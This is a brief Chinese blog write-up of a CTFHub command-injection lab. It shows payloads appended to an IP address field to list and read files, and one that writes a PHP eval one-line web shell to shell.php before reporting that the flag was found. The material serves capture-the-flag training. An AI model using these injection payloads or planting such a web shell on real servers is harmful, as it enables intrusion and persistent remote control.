ctfhub技能树—RCE—命令注入

打开靶机

查看页面信息

输入127.0.0.1进行测试

构造payload

127.0.0.1&ls

查看文件内容信息

127.0.0.1 & cat 179852221619745.php



没有反应......

利用命令执行写入一句话木马

127.0.0.1 &echo "<?php @eval(\$_POST['a']);?>" >> shell.php



成功拿到flag

posted @ 2020-03-18 11:23  anweilx  阅读(2054)  评论(2编辑  收藏  举报